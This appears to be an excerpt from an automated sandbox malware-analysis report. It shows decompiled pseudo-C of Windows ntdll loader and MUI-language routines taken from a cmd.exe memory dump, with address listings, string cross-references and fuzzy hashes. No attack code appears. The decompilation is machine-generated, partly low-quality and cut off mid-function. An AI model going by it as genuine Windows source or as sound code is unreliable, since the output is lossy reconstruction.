					_v8 = _t280;
				}
				if(E03BE1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03BE1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03BE1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03BF4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E03C1F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03C21370(_t276, 0x3bb4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E03C1BB40(0,  &_v68, _t170);
									if(L03BE43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E03C1BB40(_t257,  &_v68, _t243);
								if(L03BE43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03C21370(_t278, 0x3bb4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03BF4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E03C1F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03C21370(_v16, 0x3bb4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E03C1BB40(_t262,  &_v68, _t244);
								if(L03BE43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03C21370(_t282, 0x3bb4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E03C1BB40(_t262,  &_v68, _t201);
							if(L03BE43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03BF4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E03C1F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03C21370(_t280, 0x3bb4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E03C1BB40(_t267,  &_v68, _t245);
							if(L03BE43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03C21370(_t284, 0x3bb4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E03C1BB40(_t267,  &_v68, _t224);
						if(L03BE43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                                          0x03be3d3c
                                                                                                                                          0x03be3d42
                                                                                                                                          0x03be3d44
                                                                                                                                          0x03be3d46
                                                                                                                                          0x03be3d49
                                                                                                                                          0x03be3d4c
                                                                                                                                          0x03be3d4f
                                                                                                                                          0x03be3d52
                                                                                                                                          0x03be3d55
                                                                                                                                          0x03be3d58
                                                                                                                                          0x03be3d5b
                                                                                                                                          0x03be3d5f
                                                                                                                                          0x03be3d61
                                                                                                                                          0x03be3d66
                                                                                                                                          0x03c38213
                                                                                                                                          0x03c38218
                                                                                                                                          0x03be4085
                                                                                                                                          0x03be4088
                                                                                                                                          0x03be408e
                                                                                                                                          0x03be4094
                                                                                                                                          0x03be409a
                                                                                                                                          0x03be40a0
                                                                                                                                          0x03be40a6
                                                                                                                                          0x03be40a9
                                                                                                                                          0x03be40af
                                                                                                                                          0x03be40b6
                                                                                                                                          0x03be40bd
                                                                                                                                          0x03be40bd
                                                                                                                                          0x03be3d83
                                                                                                                                          0x03c3821f
                                                                                                                                          0x03c38229
                                                                                                                                          0x03c38238
                                                                                                                                          0x03c38238
                                                                                                                                          0x03c3823d
                                                                                                                                          0x03c3823d
                                                                                                                                          0x03be3da0
                                                                                                                                          0x03be3daf
                                                                                                                                          0x03be3db5
                                                                                                                                          0x03be3dba
                                                                                                                                          0x03be3dba
                                                                                                                                          0x03be3dd4
                                                                                                                                          0x03be3e94
                                                                                                                                          0x03be3eab
                                                                                                                                          0x03be3f6d
                                                                                                                                          0x03be3f84
                                                                                                                                          0x03be406b
                                                                                                                                          0x03be406b
                                                                                                                                          0x03be406e
                                                                                                                                          0x03be406e
                                                                                                                                          0x03be4070
                                                                                                                                          0x03be4074
                                                                                                                                          0x03c38351
                                                                                                                                          0x03c38351
                                                                                                                                          0x03be407a
                                                                                                                                          0x03be407f
                                                                                                                                          0x03c3835d
                                                                                                                                          0x03c38370
                                                                                                                                          0x03c38377
                                                                                                                                          0x03c38379
                                                                                                                                          0x03c3837c
                                                                                                                                          0x03c3837c
                                                                                                                                          0x03c3835d
                                                                                                                                          0x00000000
                                                                                                                                          0x03be407f
                                                                                                                                          0x03be3f8a
                                                                                                                                          0x03be3f8d
                                                                                                                                          0x03be3f90
                                                                                                                                          0x03be3f95
                                                                                                                                          0x03c3830d
                                                                                                                                          0x03c3830f
                                                                                                                                          0x03be3f9b
                                                                                                                                          0x03be3fac
                                                                                                                                          0x03be3fae
                                                                                                                                          0x03be3fb1
                                                                                                                                          0x03be3fb1
                                                                                                                                          0x03be3fb6
                                                                                                                                          0x03c38317
                                                                                                                                          0x03c3831a
                                                                                                                                          0x00000000
                                                                                                                                          0x03be3fbc
                                                                                                                                          0x03be3fc1
                                                                                                                                          0x03be3fc9
                                                                                                                                          0x03be3fd7
                                                                                                                                          0x03be3fda
                                                                                                                                          0x03be3fdd
                                                                                                                                          0x03be4021
                                                                                                                                          0x03be4021
                                                                                                                                          0x03be4029
                                                                                                                                          0x03be4030
                                                                                                                                          0x03be4044
                                                                                                                                          0x03be4046
                                                                                                                                          0x03be4046
                                                                                                                                          0x03be4044
                                                                                                                                          0x03be4049
                                                                                                                                          0x03c38327
                                                                                                                                          0x03c38334
                                                                                                                                          0x03c38339
                                                                                                                                          0x03c3833c
                                                                                                                                          0x03be404f
                                                                                                                                          0x03be404f
                                                                                                                                          0x03be404f
                                                                                                                                          0x03be4051
                                                                                                                                          0x03be4056
                                                                                                                                          0x03be4063
                                                                                                                                          0x03be4063
                                                                                                                                          0x03be4068
                                                                                                                                          0x00000000
                                                                                                                                          0x03be4068
                                                                                                                                          0x03be3fdf
                                                                                                                                          0x03be3fe2
                                                                                                                                          0x03be3fe4
                                                                                                                                          0x03be3fe7
                                                                                                                                          0x03be3fef
                                                                                                                                          0x03be4003
                                                                                                                                          0x03be4005
                                                                                                                                          0x03be4005
                                                                                                                                          0x03be400c
                                                                                                                                          0x03be4013
                                                                                                                                          0x03be4016
                                                                                                                                          0x03be4017
                                                                                                                                          0x03be401b
                                                                                                                                          0x03be401e
                                                                                                                                          0x00000000
                                                                                                                                          0x03be401e
                                                                                                                                          0x03be3fb6
                                                                                                                                          0x03be3eb1
                                                                                                                                          0x03be3eb4
                                                                                                                                          0x03be3eb7
                                                                                                                                          0x03be3ebc
                                                                                                                                          0x03c382a9
                                                                                                                                          0x03c382ab
                                                                                                                                          0x03be3ec2
                                                                                                                                          0x03be3ed3
                                                                                                                                          0x03be3ed5
                                                                                                                                          0x03be3ed8
                                                                                                                                          0x03be3ed8
                                                                                                                                          0x03be3edd
                                                                                                                                          0x03c382b3
                                                                                                                                          0x03c382b6
                                                                                                                                          0x00000000
                                                                                                                                          0x03be3ee3
                                                                                                                                          0x03be3ee8
                                                                                                                                          0x03be3eed
                                                                                                                                          0x03be3ef0
                                                                                                                                          0x03be3ef3
                                                                                                                                          0x03be3f02
                                                                                                                                          0x03be3f05
                                                                                                                                          0x03be3f08
                                                                                                                                          0x03c382c0
                                                                                                                                          0x03c382c3
                                                                                                                                          0x03c382c5
                                                                                                                                          0x03c382c8
                                                                                                                                          0x03c382d0
                                                                                                                                          0x03c382e4
                                                                                                                                          0x03c382e6
                                                                                                                                          0x03c382e6
                                                                                                                                          0x03c382ed
                                                                                                                                          0x03c382f4
                                                                                                                                          0x03c382f7
                                                                                                                                          0x03c382f8
                                                                                                                                          0x03c382fc
                                                                                                                                          0x03c382ff
                                                                                                                                          0x03c382ff
                                                                                                                                          0x03be3f0e
                                                                                                                                          0x03be3f11
                                                                                                                                          0x03be3f16
                                                                                                                                          0x03be3f1d
                                                                                                                                          0x03be3f31
                                                                                                                                          0x03c38307
                                                                                                                                          0x03c38307
                                                                                                                                          0x03be3f31
                                                                                                                                          0x03be3f39
                                                                                                                                          0x03be3f48
                                                                                                                                          0x03be3f4d
                                                                                                                                          0x03be3f50
                                                                                                                                          0x03be3f50
                                                                                                                                          0x03be3f53
                                                                                                                                          0x03be3f58
                                                                                                                                          0x03be3f65
                                                                                                                                          0x03be3f65
                                                                                                                                          0x03be3f6a
                                                                                                                                          0x00000000
                                                                                                                                          0x03be3f6a
                                                                                                                                          0x03be3edd
                                                                                                                                          0x03be3dda
                                                                                                                                          0x03be3ddd
                                                                                                                                          0x03be3de0
                                                                                                                                          0x03be3de5
                                                                                                                                          0x03c38245
                                                                                                                                          0x03be3deb
                                                                                                                                          0x03be3df7
                                                                                                                                          0x03be3dfc
                                                                                                                                          0x03be3dfe
                                                                                                                                          0x03be3e01
                                                                                                                                          0x03be3e01
                                                                                                                                          0x03be3e06
                                                                                                                                          0x03c3824d
                                                                                                                                          0x03c3824f
                                                                                                                                          0x03c38254
                                                                                                                                          0x00000000
                                                                                                                                          0x03be3e0c
                                                                                                                                          0x03be3e11
                                                                                                                                          0x03be3e16
                                                                                                                                          0x03be3e19
                                                                                                                                          0x03be3e29
                                                                                                                                          0x03be3e2c
                                                                                                                                          0x03be3e2f
                                                                                                                                          0x03c3825c
                                                                                                                                          0x03c3825f
                                                                                                                                          0x03c38261
                                                                                                                                          0x03c38264
                                                                                                                                          0x03c3826c
                                                                                                                                          0x03c38280
                                                                                                                                          0x03c38282
                                                                                                                                          0x03c38282
                                                                                                                                          0x03c38289
                                                                                                                                          0x03c38290
                                                                                                                                          0x03c38293
                                                                                                                                          0x03c38294
                                                                                                                                          0x03c38298
                                                                                                                                          0x03c3829b
                                                                                                                                          0x03c3829b
                                                                                                                                          0x03be3e35
                                                                                                                                          0x03be3e38
                                                                                                                                          0x03be3e3d
                                                                                                                                          0x03be3e44
                                                                                                                                          0x03be3e58
                                                                                                                                          0x03c382a3
                                                                                                                                          0x03c382a3
                                                                                                                                          0x03be3e58
                                                                                                                                          0x03be3e60
                                                                                                                                          0x03be3e6f
                                                                                                                                          0x03be3e74
                                                                                                                                          0x03be3e77
                                                                                                                                          0x03be3e77
                                                                                                                                          0x03be3e7a
                                                                                                                                          0x03be3e7f
                                                                                                                                          0x03be3e8c
                                                                                                                                          0x03be3e8c
                                                                                                                                          0x03be3e91
                                                                                                                                          0x00000000
                                                                                                                                          0x03be3e91

                                                                                                                                          Strings
                                                                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 03BE3D8C
                                                                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 03BE3E97
                                                                                                                                          • Kernel-MUI-Language-SKU, xrefs: 03BE3F70
                                                                                                                                          • WindowsExcludedProcs, xrefs: 03BE3D6F
                                                                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 03BE3DC0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                          • API String ID: 0-258546922
                                                                                                                                          • Opcode ID: b18c658ff6dfee316e9493f0180668382823ba923b3214f500e6a75360b69248
                                                                                                                                          • Instruction ID: f411866387b2c760398384c95484d95eec2d716f394cd407af58d83919760f93
                                                                                                                                          • Opcode Fuzzy Hash: b18c658ff6dfee316e9493f0180668382823ba923b3214f500e6a75360b69248
                                                                                                                                          • Instruction Fuzzy Hash: 61F15E76D00218EFCB11DF99C980AEEBBB9FF49654F1500AAE505EB211D774AE05CBA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C08E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                          			E03C08E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x3ccd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3cc8464; // 0x761c0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3cc5780 & 0x00000003) != 0) {
							E03C55510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3cc5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E03C1B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3cc7984; // 0x3472c28
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3cc8464; // 0x761c0110
					 *0x3ccb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03C09B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3cc5780 & 0x00000005) != 0) {
						_push(_t49);
						E03C55510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                                          0x03c08e0f
                                                                                                                                          0x03c08e16
                                                                                                                                          0x03c08e19
                                                                                                                                          0x03c08e1b
                                                                                                                                          0x03c08e21
                                                                                                                                          0x03c08e7f
                                                                                                                                          0x03c08e85
                                                                                                                                          0x03c49354
                                                                                                                                          0x03c4936c
                                                                                                                                          0x03c49371
                                                                                                                                          0x03c4937b
                                                                                                                                          0x03c49381
                                                                                                                                          0x03c49381
                                                                                                                                          0x03c4937b
                                                                                                                                          0x03c08e9d
                                                                                                                                          0x03c08e9d
                                                                                                                                          0x03c08e29
                                                                                                                                          0x03c08e2c
                                                                                                                                          0x03c08e38
                                                                                                                                          0x03c08e3e
                                                                                                                                          0x03c08e43
                                                                                                                                          0x03c08eb5
                                                                                                                                          0x03c08eb9
                                                                                                                                          0x03c492aa
                                                                                                                                          0x03c492af
                                                                                                                                          0x03c492e8
                                                                                                                                          0x03c492e8
                                                                                                                                          0x03c492af
                                                                                                                                          0x03c08eb9
                                                                                                                                          0x03c08e45
                                                                                                                                          0x03c08e53
                                                                                                                                          0x03c08e5b
                                                                                                                                          0x03c08e5f
                                                                                                                                          0x03c08e78
                                                                                                                                          0x03c08e78
                                                                                                                                          0x03c08e7d
                                                                                                                                          0x03c08ec3
                                                                                                                                          0x03c08ecd
                                                                                                                                          0x03c08ed2
                                                                                                                                          0x03c08ed2
                                                                                                                                          0x03c08ec5
                                                                                                                                          0x03c08ec5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c08e7d
                                                                                                                                          0x03c08e67
                                                                                                                                          0x03c08ea4
                                                                                                                                          0x03c4931a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c49320
                                                                                                                                          0x03c08ea4
                                                                                                                                          0x03c08e70
                                                                                                                                          0x03c49325
                                                                                                                                          0x03c49340
                                                                                                                                          0x03c49345
                                                                                                                                          0x03c49345
                                                                                                                                          0x03c08e76
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          Strings
                                                                                                                                          • LdrpFindDllActivationContext, xrefs: 03C49331, 03C4935D
                                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 03C4932A
                                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 03C49357
                                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 03C4933B, 03C49367
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                          • API String ID: 0-3779518884
                                                                                                                                          • Opcode ID: 6eaf8dc0b03842d79e97ebad28ce4f401a0c44ac298c8691bdc5e80065b44996
                                                                                                                                          • Instruction ID: c4af66745666d53a5a4cf2dba48bc83d0ce041123292842a5c976a1701100c3a
                                                                                                                                          • Opcode Fuzzy Hash: 6eaf8dc0b03842d79e97ebad28ce4f401a0c44ac298c8691bdc5e80065b44996
                                                                                                                                          • Instruction Fuzzy Hash: B341FB39A003959FDF34EA15884DB76B778AB05654F0DC1A5E825DB1D1EB70AE808783
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BE8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                          			E03BE8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E03BE934A() != 0) {
								_t159 = E03C5A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3cc5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03C55510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3cc5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E03BE849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03BE8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03BE8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3cc5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3cc5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03BF2280(_t92, 0x3cc86cc);
															_t94 = E03CA9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E03C061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3cc5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03BE8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3cc5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3cc5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E03C1F380(_t136, 0x3bb1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03BF2280(_t108, 0x3cc86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E03C061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03CA9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E03BEFFB0(_t118, _t156, 0x3cc86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03C19A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                                                          0x03be8799
                                                                                                                                          0x03be879d
                                                                                                                                          0x03be87a1
